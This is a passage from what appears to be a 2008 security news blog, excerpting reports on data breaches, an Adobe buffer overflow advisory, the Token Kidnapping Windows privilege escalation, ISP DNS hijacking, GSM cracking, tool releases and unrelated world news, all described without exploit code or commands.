Still, this breach does not rank among the top dozen or so nationally. Retailer TJ Maxx reported that as many as 100 million accounts were compromised as a result of thefts and hack-ins since last year.

The U.S. Department of Veterans Affairs said information on more than 28 million veterans might have been exposed after a laptop was stolen from an employee's house in 2006. Monster.com, a Web-based job service, said information on more than 1 million job seekers had been stolen last year, containing names, addresses, phone numbers and e-mail addresses.

A spokesman for Citizens Gas said its missing records were past-due billing statements for 51,000 former customers that it was unable to find on its own. The information included names, last known addresses, Social Security numbers, dates of service and amount due.

Citizens has no way of notifying the former customers because their whereabouts are unknown, spokesman Dan Considine said.

"We certainly take this very seriously, any time there is a security breach, and we hope it gets cleared up very soon," he said.

St. Vincent Health said it had not given any billing business to Central Collection in more than three years, so all of the missing billing information is several years old. The stolen information included patient billing information for St. Vincent Hospital and affiliated physicians' practices, spokesman Johnny Smith said.

"We're committed to protecting confidential information of our patients. We regret any inconvenience to them," Smith said.

Billing records of about 62,000 patients of Methodist Medical Group, a physicians' group owned by Clarian Health, also were missing, as are the records of thousands of patients at Howard Regional Health System in Kokomo.

The break-in is being investigated by IMPD and the Indiana attorney general's office.

Space Workers Find Message In A Bottle And Decide To Answer It

Via efluxmedia.com -

What are the chances for a message in a bottle to be answered? Pretty high, if the sea is kind enough to bring it all the way from Bahamas to NASA’s Kennedy Space Center.

United Space Alliance worker Jill Vogel accidentally discovered the bottle while voluntarily cleaning the beach at the space center. The letter wrote “Dear sea penpal” and originated from a 9-year-old girl from Holy Name Catholic School in Bimini.

As it appears, every year on Columbus Day (which celebrates Columbus’ arrival in the Americas), the girl takes part in a class project: she and her classmates send messages in bottles out to sea, hoping someone would find them and answer them.

“What a cool thing for a kid,” said Vogel, as quoted by Local 6 News.

The letter was apparently written in October, but it’s never too late to answer, and the workers at the United Space Alliance decided to surprise her by responding to her wish: “I hope you respond to my letter,” the little girl wrote.

Vogel and his colleagues sent back to Bahamas space memorabilia, including crew photos, pins, stickers and information about astronauts. NASA, Keep Brevard Beautiful and Wildlife Refuge contributed with items as well.

The package was sent by mail (to make sure it gets there) and all those who contributed to it are excited and can’t wait for the package to reach its destination.

Baker College wins National Collegiate Cyber Defense Competition

Via Linux.com -

Baker College of Flint, Mich., defeated defending champion Texas A&M University and four other regional winners from across the country to capture the third annual National Collegiate Cyber Defense Competition, which concluded in San Antonio, Texas, over the weekend. Texas A&M finished a close second, and the University of Louisville took third. Also competing for the championship were the Community College of Baltimore County, Mount San Antonio College of Los Angeles County, and the Rochester Institute of Technology.

Hosted by the Center for Infrastructure Assurance and Security (CIAS) at the University of Texas at San Antonio (UTSA), the event pits six regional winners, each given a similar small enterprise network to protect, against a team made up of experienced security professionals dubbed the Red Team, a.k.a. Team Hilarious.

Teams are scored on how well they protect their identical networks, made up a Cisco router and five servers: Windows 2003 running Internet Information Services, Windows 2000 running DNS, Solaris X86 running Apache and OpenSSL, Gentoo running MySQL and NFS, and BSD running Sendmail. Team workstations can run Vista, Windows, Fedora, or BSD, as the team prefers. Teams are required to provide SMTP, POP3, HTTP, HTTPS,and DNS services throughout the competition, and outages on any of those services result in deductions from their score. At specified times, the teams are also asked to bring up FTP, SSH, RDP, and VNC services, in accordance with the 2008 competition rules.

In addition to the attackers (the Red Team) and the defenders (the Blue Teams), there is also a White Team. The White Team acts as the overall network operations center, observers, and as communications center. All requests for information, assistance, and problem reporting by the competing teams go through the White Team; teams are not allowed direct communication with the outside world except for publicly available information and software available on the Internet. The White Team also delivers in-competition requests for new services and scores the teams' performance.

...

In addition to a few members of the press, the Red Team room was also visited by various federal agents. A contingent from the Secret Service was present all weekend. Three black-suited gentlemen claiming to be from the FBI were present Friday. Defense Information Systems Agency agents were present as part of the competition infrastructure, and among their other duties, helped escort journalists from room to room during the event.

...

Baltimore County Community College, the only team with a female competitor, and Mount San Antonio Community College in Los Angeles, proved that network security skills are not the exclusive domain of larger, better-known institutions. Their presence at this national competition is roughly the equivalent of a community college basketball team making it to the NCAA's Final Four, and both schools and students deserve kudos for going head to head against teams from much larger schools, especially since those schools may include two graduate students on their team.

Dr. Gregory White, director of the UTSA CIAS, one of the founders of the original competition when it was held on a regional basis rather than nationally, explained there is a large network and computer security population in San Antonio, primarily because the Air Intelligence Agency is located there. UTSA was a logical place to become an academic center for computer and network security. That led to it become the first Texas university to be designated as a "Center for Academic Excellence in Information Assurance Education" by both the DHS and the National Security Agency, and it currently offers bachelor and masters-level degrees in information security from several of its schools.

Sponsors for this year's event included the AT&T Foundation, DHS, Cisco Systems, Acronis, Northrop Grumman, Accenture, the Information Systems Security Association, Core Security, our sister site ThinkGeek, Code Magazine, and Pepsi. White said that more sponsors are needed for future competitions in order to do all the things CIAS wants to accomplish.

---------------------------

I agree with my fellow Texan, Joe Barr.

The word "Cyber" does sound very 90s.

Which reminds me, AMC tomorrow night...Wargames is on, 25th years.

Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit

Exploitable issue in various Adobe products
c0ntex (c0ntexb@gmail.com) Scott Laurie
February 2008

Vulnerable applications, tested:
Adobe Photoshop Album Starter
Adobe After Effects CS3
Adobe Photoshop CS3

Not Vulnerable applications, tested:
Adobe Reader
Adobe Flash Player

This bug is related to the parsing of header images, in that the applications do not verify that the image header is valid before trying to render it. This leaves an opportunity to cause an unchecked buffer overflow and allow for the execution of malicious code.

All the issues are standard local overflows whereby an attacker can exploit a machine after sending the malicious image to the user, or by placing the image on a web site or email and waiting for a user to view it in one of the effected products.

One fun thing with Album Starter is that it will run a service which will look for new devices being attached to the system, things like cameras or USB drives and when one is found it will check the device for image files. If some are found, the application will auto-run and import the images and thus allow the attacker to exploit locked workstations.. pretty lame but fun :)

http://www.milw0rm.com/exploits/5479

Microsoft: Finding Flaws On Our Website is OK

Via The Register UK -

In a first for a major company, Microsoft has publicly pledged not to sue or press charges against ethical hackers who responsibly find security flaws in its online services.

The promise, extended Saturday at the ToorCon security conference in Seattle, is a bold and significant move. While researchers are generally free to attack legally acquired software running on their own hardware, they can face severe penalties for probing websites that run on servers belonging to others. In some cases, organizations have pursued legal action against researchers who did nothing more than discover and responsibly report serious online vulnerabilities.

"This is actually really important because online services - that's our stuff," Microsoft security strategist Katie Moussouris told several hundred researchers. "The philosophy here is if someone is being nice enough to point out your fly is down, they're really doing you a favor and you should thank them rather than calling the cops and saying you're a pervert."

Moussouris said she is pushing to get a provision added to a proposed standard that's making its way through the International Organization for Standardization that would protect ethical hackers who responsibly disclose vulnerabilities in other companies' websites. "If I get my way, it'll be in there," she said.

(In a brief exchange after her talk, Moussouris told us she didn't know offhand exactly how the proposed standard was designated. We're guessing it's this one, though we can't be sure.)

The idea is to make websites safer by taking advantage of the legions of independent researchers who stumble upon security bugs. As she put it: "Don't hate the finder, hate the vulnerability. We don't actually want to discourage people who are trying to help us by being iffy about whether we're going to go after them."

As things stand, researchers frequently turn a blind eye to gaping security holes on websites for fear of suffering a fate similar to that of Eric McCarty. The prospective student at the University of Southern California found a flaw in the school's online application system that gave him access to other applicants' records. In 2006, he was charged with computer intrusion after producing proof of his finding.

"There's definitely a lot of trepidation among legitimate researchers to find flaws in public-facing web applications because you never know how [companies] are going to react," said Alex Stamos, a founding partner at iSEC Partners, a firm that provides penetration-testing services. "That hurts us because the only people finding these flaws are the bad guys."

-----------------------

Kudos to Microsoft.

Why the Flu Vaccine Fizzled

Via NYTimes.com -

Anyone who dutifully got a flu vaccination this year only to come down with a serious fever, chills or cough had plenty of company. An analysis issued last week by the Centers for Disease Control and Prevention estimated that this year’s vaccine formulation was only 44 percent effective. That feeble performance, along with the virulence of one of the strains, made the flu season much worse than the previous three.

Not all of the news is bad. In a separate report, scientists tracked the previously mystifying origins and pathways of influenza viruses. Such information should help them make better vaccines.

What makes flu so hard to prevent is that the virus changes its molecular structure from year to year. Each year, experts try to guess which strains found anywhere in the world are apt to circulate in this country in the next flu season. They then formulate a vaccine to protect against those strains.

When they guess right, as is usually the case, the vaccine can be 70 to 90 percent effective in healthy adults. When they guess wrong, as happened this year, the mismatch leaves many recipients vulnerable.

This year’s vaccine was designed to protect against two strains of influenza A and one strain of influenza B. Based on an analysis in central Wisconsin, the vaccine proved 58 percent effective against the predominant A strain but totally ineffective against the B strain.

In research that could improve the likelihood of picking the right strains, an international team led by British scientists has documented — through molecular and genetic analysis — how seasonal flu strains evolve and sweep around the world. It turns out that new flu strains emerge in several countries in East and Southeast Asia, and are then carried by travelers to Europe and North America some six to nine months later. Several months after that they reach South America, where they die out. Then the whole process starts over.

Although scientists knew generally that influenza strains often emerge from in and around China, the new research expands the area that bears watching and surely bolsters the case for greatly enhanced surveillance in Asia. With any luck, that would lead to better and earlier identification of the strains that will be circulating — the key to making an effective vaccine.

DARPA Seeks Architecture-Aware Compilers

Via GCN.com -

The Defense Advanced Research Projects Agency is looking for smarter compilers — specifically, the agency is looking to fund development of compilers that can dynamically optimize programs for the specific environments in which they will run, according to a broad area announcement just released by the agency.

"The goal of DARPA’s envisioned Architecture-Aware Compiler Environment [AACE] Program is to develop computationally efficient compilers that incorporate learning and reasoning methods to drive compiler optimizations for a broad spectrum of computing system configurations," BAA 08-30 states.

Today's compilers were written under the assumption that the programs they create will run on single-processor systems, the document states. Yet the Defense Department is running programs across an ever-widening array of systems, from small embedded computers to clustered systems with thousands of processors. Tuning a program to run under unusual environments tends to be a lengthy and manual process. DARPA would like to automate much of the work associated with this task.

"An architecture[-]aware compiler should ... be able to significantly reduce the number of feedback loops required to achieve major performance improvements," the BAA states.

What DARPA is seeking is a new generation of compilers that can incorporate performance-tuning modules. When compiling application code, such compilers would consult static files (generated by a characterization program) that describe the environment in which that program will run. This compiler-of-the-future will then optimize its program for that specific environment, using not only this static characterization data but also dynamic data taken directly from the system itself.

"The runtime system will collect performance data in a knowledge database that can be reused by other applications that are executed on the system," the BAA states. DARPA also suggests that the compiler will need reasoning mechanisms in order to know what to do with this static and dynamic performance data.

The BAA only mentioned the C and Fortran programming languages as possible candidates for which compilers could be written. It does, however, encourage work in those languages that support techniques for parallelization of programs, such as the Message Passing Interface and OpenMP interface, and any languages using the Partitioned Global Address Space, such as Parallel C.

DARPA's Information Processing Techniques Office issued the BAA. Companies and research institutions have until June 2 to submit their initial proposals for consideration of funding.

The BAA did not disclose the amount DARPA plans to spend on this effort, stating that the amount will depend on the quality of the proposals received. The BAA does present a road map to fund this work at least through 2011.

US Gov Opens Wireless Systems Testing Lab

Via GCN.com -

Government defense and intelligence agencies have taken the wraps off a lab opened in the first quarter of this year for testing and evaluating wireless systems that transmit classified data.

The lab, developed by systems integrator Lockheed Martin, allows the agencies to test 802.11 Wi-Fi or broadband satellite links on a top-secret/sensitive compartmented information network.

The agencies will be able to test a broad spectrum of wireless networks, including Bluetooth, 802.16 WiMax, cell phones, and Ku- and C-band satellite communications. The lab is sealed and reinforced to ensure that signals from the systems stay within the chamber.

The Wireless Cyber Security Center, based in Hanover, Md., will allow agencies to define and evaluate wireless security strategies, policies and concepts of operation. The facility also will support projects to evaluate next-generation security technologies and assess vulnerabilities. Officials can also use the installation to evaluate mobile ad-hoc networks, which play an increasing role in battlefield communications.

Government agencies already are using the lab to conduct vulnerability testing, said Lockheed Martin spokesman Mattt Kramer. Results from the lab and the processes are secured, and they can potentially be labeled top secret, he said.

“We provide an actual classified environment using those technologies…. You can simulate it, but it’s no substitute for the real thing.” Testing these technologies over an actual network would potentially expose risks, Kramer said.

Wireless networks in use by the government today are not necessarily connected to a classified network, said Kramer. Defense and intelligence agencies are interested in testing these wireless networks to potentially transfer top-secret information over them.

The lab is one of only a handful capable of testing commercial wireless cybersecurity, said Kramer.

ISPs' Error Page Ads Let Hackers Hijack Entire Web

Via Wired.com -

Seeking to make money from mistyped website names, some of the United States' largest ISPs instead created a massive security hole that allowed hackers to use web addresses owned by eBay, PayPal, Google and Yahoo, and virtually any other large site.

The vulnerability was a dream scenario for phishers and cyber attackers looking for convincing platforms to distribute fake websites or malicious code.The hole was quickly and quietly patched Friday after IOActive security researcher Dan Kaminsky reported the issue to Earthlink and its technology partner, a British ad company called Barefruit. Earthlink users, and some Comcast subscribers, were at risk.

Kaminsky warns that the underlying danger lingers on.

"The entire security of the internet is now dependent on some random-ass server run by some British company," Kaminsky said.

At issue is a growing trend in which ISPs subvert the Domain Name System, or DNS, which translates website names into numeric addresses.

When users visit a website like Wired.com, the DNS system maps the domain name into an IP address such as 72.246.49.48. But if a particular site does not exist, the DNS server tells the browser that there's no such listing and a simple error message should be displayed.

But starting in August 2006, Earthlink instead intercepts that Non-Existent Domain (NXDOMAIN) response and sends the IP address of ad-partner Barefruit's server as the answer. When the browser visits that page, the user sees a list of suggestions for what site the user might have actually wanted, along with a search box and Yahoo ads.

The rub comes when a user is asking for a nonexistent subdomain of a real website, such as http://webmale.google.com, where the subdomain webmale doesn't exist (unlike, say, mail in mail.google.com). In this case, the Earthlink/Barefruit ads appear in the browser, while the title bar suggests that it's the official Google site.

As a result, all those subdomains are only as secure as Barefruit's servers, which turned out to be not very secure at all. Barefruit neglected basic web programming techniques, making its servers vulnerable to a malicious Javascript attack. That meant hackers could have crafted special links to unused subdomains of legitimate websites that, when visited, would serve any content the attacker wanted.

The hacker could, for example, send spam e-mails to Earthlink subscribers with a link to a webpage on money.paypal.com. Visiting that link would take the victim to the hacker's site, and it would look as though they were on a real PayPal page.

Finjan Exposes Website Running Crimeware as a Service (CAAS)

Via Register UK -

Security researchers have uncovered a new web-based service containing security credentials for more than 8,700 websites belonging to Fortune 500 companies and government agencies. It allows miscreants to infect some of the internet's most popular destinations with a few clicks of the mouse.

According to security provider Finjan, the service categorizes the list of available sites by a variety of characteristics, including the country where they're hosted and their popularity. After paying a fee, criminals can select the domain they want to compromise and then use it as a means to infect vulnerable machines that later visit the site.

The service provides a menu of malware titles that can be pushed to unwitting visitors. It also allows miscreants to upload custom exploits, according to Yuval Ben-Itzhak, chief technology officer at Finjan.

In a sense, this crimeware as a service (CAAS) was inevitable. According to an earlier report from Finjan, more than 51 percent of websites that pushed malicious content in the second half of 2007 were legitimate destinations that had been commandeered by bad guys. The service is evidence that there's money to be made in automating that process - and one more sign that cyber-crime has grown into a full-fledged business where no opportunity to turn a profit is passed up.

"You can imagine the magnitude of this marketplace now," he said in an interview. "They really commercialize everything in this eco-system."

About 10 of the compromised sites are among the 100 most popular internet destinations as measured by Alexa.com. Another 100 are ranked in the top 100 to 500. Sites include some of the world's more elite organizations, including companies in the financial services, manufacturing and technology industries. They also include government agencies, including at least one belonging to a superior court in the US. Most of the sites are located in the US. Other origins included the Russian Federation, Australia, Ukraine, the Czech Republic and the UK.

Ben-Itzhak declined to identify the sites by name. He said Finjan has so far alerted only about a dozen of the compromised sites. Companies that want to find out if they're on the list can contact a Finjan representative using this link.

The service is able to seamlessly infect the websites because it has a database containing file transfer protocol usernames, passwords and server addresses that are typically used by legitimate webmasters to add, change or delete pages. The credentials were most likely stolen by infecting the PCs of administrators with keyloggers, Ben-Itzhak said.

A site called meoryprof.info has been used to access the service. At te time of writing, it was inaccessible to us. As long as the FTP credentials remain valid, you can bet it's only a matter of time before the service pops up on another site.

Indonesia Arrests Two JI Members

Via Reuters India -

Indonesia has arrested two more members of Islamic militant group Jemaah Islamiah (JI), a senior police official told Reuters, which could lead to the arrest of other key militants wanted for attacks in Southeast Asia.

In particular, the police official said the arrests could help lead to the capture of Noordin Mohammad Top, one of the most senior members of Jemaah Islamiah who is still on the run.

The two men -- Abdul Rohim, who also uses the name Abu Husna, and a man identified only as Agus -- were caught in Malaysia more than two weeks ago and have been transferred to a detention centre in Jakarta, according to the police official in Jakarta, who declined to be identified by name.

Abu Husna "is a member of the markaziah, the central board of the organisation," the police official said, while the man identified as Agus was involved in attacks in Sulawesi and Java, and has close links to Abu Dujana, the military commander of Jemaah Islamiah, he added.

Sidney Jones, a expert on the Jemaah Islamiah at Brussels-based think-tank, the International Crisis Group, said Abu Husna is believed to have replaced Zarkasih as the head of JI, after Zarkasih was arrested last year in Indonesia.

"Abu Husna is a central figure in the organisation and he would know everything about the current activities, command structure and so on," said Jones, who is based in Jakarta.

Abu Husna has previously been the JI central command's head of education, overseeing some two dozen or so JI schools across Indonesia, according to Jones.

The other man who was arrested could be Agus Purwanto, Jones said, adding that he had studied at the famous Islamic boarding school run by the controversial cleric, Abu Bakar Bashir, in Solo, central Java. Bashir was jailed for 30 months for conspiracy over the Bali bombings but was later cleared.

Chinese Troops On The Streets of Zimbabwean City

Via Independent.co.uk -

Chinese troops have been seen on the streets of Zimbabwe's third largest city, Mutare, according to local witnesses. They were seen patrolling with Zimbabwean soldiers before and during Tuesday's ill-fated general strike called by the opposition Movement for Democratic Change (MDC).

Earlier, 10 Chinese soldiers armed with pistols checked in at the city's Holiday Inn along with 70 Zimbabwean troops.

One eyewitness, who asked not to be named, said: "We've never seen Chinese soldiers in full regalia on our streets before. The entire delegation took 80 rooms from the hotel, 10 for the Chinese and 70 for Zimbabwean soldiers."

Officially, the Chinese were visiting strategic locations such as border posts, key companies and state institutions, he said. But it is unclear why they were patrolling at such a sensitive time. They were supposed to stay five days, but left after three to travel to Masvingo, in the south.

China's support for President Mugabe's regime has been highlighted by the arrival in South Africa of a ship carrying a large cache of weapons destined for Zimbabwe's armed forces. Dock workers in Durban refused to unload it.

The 300,000-strong South African Transport and Allied Workers Union (Satawu) said it would be "grossly irresponsible" to touch the cargo of ammunition, grenades and mortar rounds on board the Chinese ship An Yue Jiang anchored outside the port.

A Satawu spokesman Randall Howard said: "Our members employed at Durban container terminal will not unload this cargo, neither will any of our members in the truck-driving sector move this cargo by road. South Africa cannot be seen to be facilitating the flow of weapons into Zimbabwe at a time where there is a political dispute and a volatile situation between Zanu-PF and the MDC."

Three million rounds of AK-47 ammunition, 1,500 rocket-propelled grenades and more than 3,000 mortar rounds and mortar tubes are among the cargo on the Chinese ship, according to copies of the inventory published by a South African newspaper.

RumorMill: Windows XP Service Pack 3 Coming Soon

Via SANS ISC -

Information Week and Neowin.net are reporting that Windows XP Service Pack 3 may be showing up at the end of this month. OEMs and MSDN/Technet subscribers will apparently have access on the 21st, with release to Windows Update on the 29th.

http://www.informationweek.com/news/windows/operatingsystems/showArticle.jhtml?articleID=207200856

This is an unofficial report - we do not have confirmation from Microsoft for this.

Sudanese Gov Continues to Censor Private Media

Via RSF.org -

Reporters Without Borders called on the Sudanese government today to lift its almost three-month censorship of the privately-owned press in Khartoum which has intensified in recent days with the seizure of six daily newspapers.

"These are the most serious press freedom violations since the 2005 peace agreement that was supposed to end emergency laws,” the worldwide press freedom organisation said. “Secret police surveillance of newspaper staff is outrageous and illegal and the national unity government must put a stop to it. The media, one of the better aspects of modern Sudan, is being punished without reason and in violation of the national constitution.”

The National Security Service (NSS) domestic intelligence agency phoned the editors of 10 daily papers on 13 April and ordered them to henceforth submit all their content for prior approval under the censorship illegally reestablished on 6 February. But the papers all refused to comply and printed their editions in the normal way. The police then went to the printers and seized copies of Ajras al-Huriyya, Rai al-Shaab and Al-Ayyam on 15 April.

The editions of Al-Sudani, al-Ahdath, Ajras al-Huriyya, Rai al-Shaab and the English-language daily The Citizen were seized the next day (yesterday) after several tens of thousands of copies had been printed. The four Arab-language dailies had been warned not to report the press conference held the day before by the editors of Ajras al-Huriyya criticising the new censorship, a local journalist told Reporters Without Borders.

One Nation Under CCTV

http://www.banksy.co.uk/

Tools of the Trade - Happy Birthday Edna Parker

Maybe it was a lifetime of chores on the family farm that accounts for Edna Parker's long life. Or maybe just good genes explain why the world's oldest known person will turn 115 on Sunday, defying staggering odds.

Scientists who study longevity hope Parker and others who live to 110 or beyond - they're called supercentenarians - can help solve the mystery of extreme longevity.

"We don't know why she's lived so long," said Don Parker, her 59-year-old grandson. "But she's never been a worrier and she's always been a thin person, so maybe that has something to do with it." On Friday, Edna Parker laughed and smiled as relatives and guests released 115 balloons into sunny skies outside her nursing home. Dressed in pearls, a blue and white polka dot dress and new white shoes, she clutched a red rose during the festivities. Two years ago, researchers from the New England Centenarian Study at Boston University took a blood sample from Parker for the group's DNA database of supercentenarians.

http://www.physorg.com/news127759556.html

-----------------------------------

On to the tools....

On April 19th, Filezilla 3.0.92 was released. FileZilla is a powerful FTP-client for Windows NT4, 2000 and XP. It has been designed for ease of use and with support for as many features as possible, while still being fast and reliable

On April 18th, Adam Laurie released RFIDIOt-0.1s. RFIDIOt is a open source RFID exploration python library and toolkit. The big news with this release is that by popular demand, there is now a separate Windows distribution.

On April 17th, Microsoft SysInternals released Process Monitor v1.32 & Process Explorer v11.13. Use Process Explorer to find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. Monitor file system, Registry, process, thread and DLL activity in real-time with Process Monitor.

On April 12th, KeePass v1.11 was released. KeePass is a free/open-source password manager or safe which helps you to manage your passwords in a secure way. Check the press release for all the change details.

On April 11th, Paint.NET 3.30 was released. Paint.NET is image and photo manipulation software designed to be used on computers that run XP, Server 2003 or Vista.

On April 9th, Adobe Systems released Flash Player v9.0.124.0. This release addressed several security vulnerabilities.

On April 2nd, Mozilla released Firefox 3 Beta 5. Improvements to the JavaScript engine as well as profile guided optimizations have resulted in continued improvements in performance. Compared to Firefox 2, web applications like Google Mail and Zoho Office run twice as fast in Firefox 3 Beta 5.

On March 31st, Pidgin 2.4.1 was released. Pidgin is a multi-protocol Instant Messaging client that allows you to use all of your IM accounts at once. Check out changelog for all the details.

On March 30th, Wireshark 1.0.0 was released. Wireshark (formerly Ethereal) is a network protocol analyzer for Unix and Windows. This new release addresses several DoS vulnerabilities.

On March 28th, Nullsoft released Winamp 5.53. Check the version history for all the changes.

On March 27th, The Honeynet Project and School of Mathematics, Statistics and Computer Science at Victoria University of Wellington released Capture-HPC v2.1. Capture-HPC is an innovative security product that is able to find and investigate the increasing problem of client-side computer attacks. This new software release increases the features and speeds performance allowing anyone to investigate a larger range and quantity of client-side computer attacks. It is written and distributed under the GNU General Public License, v2.

On March 26th, GNU Privacy Guard released GnuPG 1.4.9 & GnuPG 2.0.9. This is a maintenance release to fix a possible vulnerability introduced with 1.4.8.

The Sim Toolkit Research Group

THC is proud to announce the SIM Toolkit Research Project. We are looking for talented people. The goal is to uncover secrets of the SIM card and learn how it really works.

http://wiki.thc.org/gsm/simtoolkit

GSM Cracking: Coming Soon to a Computer Near You via a Web Service

Via O'Reilly Radar -

A web service that will make it easy and inexpensive to crack the GSM A5/1 encryption protocol, quickly enough for a call that is still in progress, is slated to launch at the end of April. Living right at the intersection of open hardware, open source software, software as a service, and cryptography, the service will reduce the cost and effort of cracking GSM call encryption by at least an order of magnitude.

The service is being developed by members of the GSM Software Project and demonstrates just how much things have changed in the world since the GSM system was designed. Various approaches to cracking both A5/1 (the European standard) and A5/2 (the weaker US standard) have been available for some time but this one is unique in that it should be available to researchers and hackers at the end of April in hosted api form instead of pdf.

China Tries to Limit Internet Vitriol Toward the West

Via LATimes.com -

As Chinese nationalism flares across cyberspace, the government is growing concerned that passions could spill over into the real world, and that anger directed against foreigners could turn inward.Critics contend that Beijing has had a role in fanning the xenophobic sentiment to counter international condemnation of its crackdown on Tibetan rioters, but now Chinese officials appear to be trying to rein in the vitriol.

Chinese censors have quietly warned cyber-police and Internet businesses to delete all information related to protests against Western policies, nations or companies that have proliferated in the wake of demonstrations surrounding the global Olympic torch relay and high-level calls to boycott the opening ceremony of the Summer Games in Beijing.

The notice issued this week by China's "Internet Inspection Sector" instructs recipients to reset the keywords used to block access to certain websites, relay the instructions through all Internet distribution channels and delete the notice in a timely manner.

The censors' notice cites the danger that Internet-fueled emotions could lead to unrest."Internet users are in a most intense mood toward Western countries," it said. "Such information has shown a tendency to spread and, if not checked in time, could even lead to events getting out of control as they did with the April 9 incident against Japan."

That was a reference to April 2005, when demonstrators attacked Japan's embassy in Beijing and consulate in Shanghai, burned Japanese goods and beat Japanese citizens because of Tokyo's bid to join the U.N. Security Council and over Japanese textbooks that downplayed Tokyo's World War II aggression.

Notorious eBay Hacker Arrested in Romania

Via The Register UK -

Vladuz, the notorious hacker who repeatedly accessed off-limits parts of eBay's network and then publicly bragged about it, has been arrested, the online auctioneer says.

The hacker was arrested by Romanian law enforcement officials with the help of the US Secret Service, the FBI and eBay's global fraud investigation team, eBay said. The company wouldn't discuss additional details, and representatives from the Secret Service and the FBI couldn't be reached for comment.

According to Romanian news reports here and here, Vlad Constantin Duiculescu, 20, was arrested in a communist-era housing project in Bucharest. A court in that city remanded the suspect in custody for an initial 29 days.

'Judicial Scandal' in Pirate Bay Case

Via thelocal.se (Sweden) -

A Swedish police officer involved in the investigation of file sharing site The Pirate Bay has been given a job with one of the plaintiffs in the case, film company Warner Brothers.

The officer began working for Warner Brothers job several months after the preliminary investigation was completed. The same police officer is scheduled to appear as a witness in the forthcoming Pirate Bay trial, newspaper Sydsvenskan reports.

Defence lawyer Peter Althin said he would be looking into the matter.

"The question is how long this was under consideration. If it was under consideration at the time of the investigation then it is a scandal," he told Sydsvenskan.

Althin is representing Peter Sunde, one of four men charged charged with being an accessory to breaking copyright law.

"This is a judicial scandal. Talk about a conflict of interests," Sunde told the newspaper.

If the police officer is found to have entered into discussions with Warner Brothers before the end of the investigation, which took a year and a half to complete, it is possible that the prosecution will have to scrap its findings and start again, said Althin.

Token Kidnapping: New Windows Kernel Bug Released in HITB

http://conference.hitb.org/hitbsecconf2008dubai/?page_id=182

Presentation Title: Token Kidnapping

Presentation Details:
This presentation is about a new technique for elevating privileges on Windows mostly from services, this technique exploits design weaknesses in Microsoft Windows XP, 2003, Vista and even Windows 2008. While in Windows vista and 2008 many new security protections have been added, because the weaknesses some of the new protection mechanisms are almost useless.

It will be explained how it’s possible in Windows XP and 2003 to elevate privileges to LOCAL SYSTEM from any process that has impersonation rights, and in Windows Vista and Windows 2008 how to elevate privileges to LOCAL SYSTEM from processes running under NETWORK SERVICE and LOCAL SERVICE accounts demonstrating that running code under NETWORK SERVICE or LOCAL SERVICE is non sense since always it’s possible to end up running code under LOCAL SYSTEM account. It will be showed 0day code for elevating privileges in SQL Server and Internet Information Services.

-----------------------

Compare that to the Windows Advisory release.

Sounds right on the money.

Thanks to K for the heads up.

UPDATE (4/19/2008) 2:23PM CST - Cesar posted the following message on several mailing list today.

Token Kidnapping (Microsoft Security Advisory 951306) presentation available

Presentation is available at:
http://www.argeniss.com/research/TokenKidnapping.pdf

Exploit code won't be released for a while due to
Microsoft request.

Enjoy.

Cesar.

European Union Tightens Anti-Terrorism Laws

Via BBC -

European Union ministers have agreed to punish incitement to terrorism through the internet.

At a meeting in Luxembourg, EU justice and interior ministers tightened existing laws.

Public provocation to commit terrorist attacks, as well as recruiting and training people for terrorism will be punishable offences throughout the EU.

The ministers also agreed on an action plan to prevent terrorist groups from getting explosives.

EU officials said the decision to punish propaganda, recruitment and training for terrorism through the internet filled an important gap in European legislation.

They described the internet as a virtual training camp for militants, used to inspire and mobilise local groups.

Earlier this month, the EU anti-terrorism co-ordinator, Gilles de Kerchove, said the threat of terrorism in Europe had not diminished and about 5,000 internet sites were being used to radicalise young people.

National courts will now be able to ask internet service providers to remove such sites.

Britain, Spain and Italy already punish public incitement to terrorism.

But under pressure from Nordic countries and civil rights campaigners, ministers made clear that the new provisions may not be used to restrict freedom of expression.

In a separate move to combat terrorism, they agreed to establish an early-warning system on stolen explosives and detonators by the end of the year.

UK Police to Hold Suspect Arrested Under the Terrorism Act

Via BBC -

Police in Bristol have been granted a further seven days to question a 19-year-old man arrested under the Terrorism Act.

The extension comes after Avon and Somerset police conducted a controlled explosion early Friday in a cul-de-sac in the Westbury-on-Trym area.

Bomb disposal units returned to the area late Friday.

The suspect was named as Andrew Ibrahim, a British Muslim convert who moved into the area three weeks ago.

The controlled blast was carried out after a raid on the suspect's home in the immediate area.

The materials blown up are to be analysed as part of what police described as a "long and complex" investigation, sparked by an intelligence tip-off.

Residents were evacuated and some were expected to be kept out of their homes until at least Saturday.

Vulnerability in Windows Could Allow Elevation of Privilege

Microsoft Security Advisory (951306)
Vulnerability in Windows Could Allow Elevation of Privilege
Published: April 17, 2008

Microsoft is investigating new public reports of a vulnerability which could allow elevation of privilege from authenticated user to LocalSystem, affecting Windows XP Professional Service Pack 2 and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008. Customers who allow user-provided code to run in an authenticated context, such as within Internet Information Services (IIS) and SQL Server, should review this advisory. Hosting providers may be at increased risk from this elevation of privilege vulnerability.

Currently, Microsoft is not aware of any attacks attempting to exploit the potential vulnerability. Upon completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through a service pack, our monthly security update release process, or an out-of-cycle security update, depending on customer needs.

U.S. to Expand Collection Of Crime Suspects' DNA

Via Washington Post -

The U.S. government will soon begin collecting DNA samples from all citizens arrested in connection with any federal crime and from many immigrants detained by federal authorities, adding genetic identifiers from more than 1 million individuals a year to the swiftly growing federal law enforcement DNA database.

The policy will substantially expand the current practice of routinely collecting DNA samples from only those convicted of federal crimes, and it will build on a growing policy among states to collect DNA from many people who are arrested. Thirteen states do so now and turn their data over to the federal government.

The initiative, to be published as a proposed rule in the Federal Register in coming days, reflects a congressional directive that DNA from arrestees be collected to help catch a range of domestic criminals. But it also requires, for the first time, the collection of DNA samples from people other than U.S. citizens and legal permanent residents who are detained by U.S. authorities.

Although fingerprints have long been collected for virtually every arrestee, privacy advocates say the new policy expands the DNA database, run by the FBI, beyond its initial aim of storing information on the perpetrators of violent crimes.

They also worry that people could be detained erroneously and swept into the database without cause, and that DNA samples from those who are never convicted of a crime, because of acquittal or a withdrawal of charges, might nonetheless be permanently retained by the FBI.

"Innocent people don't belong in a so-called criminal database," said Tania Simoncelli, science adviser for the American Civil Liberties Union. "We're crossing a line."

She said that if the samples are kept, they could one day be analyzed for sensitive information such as diseases and ancestry.

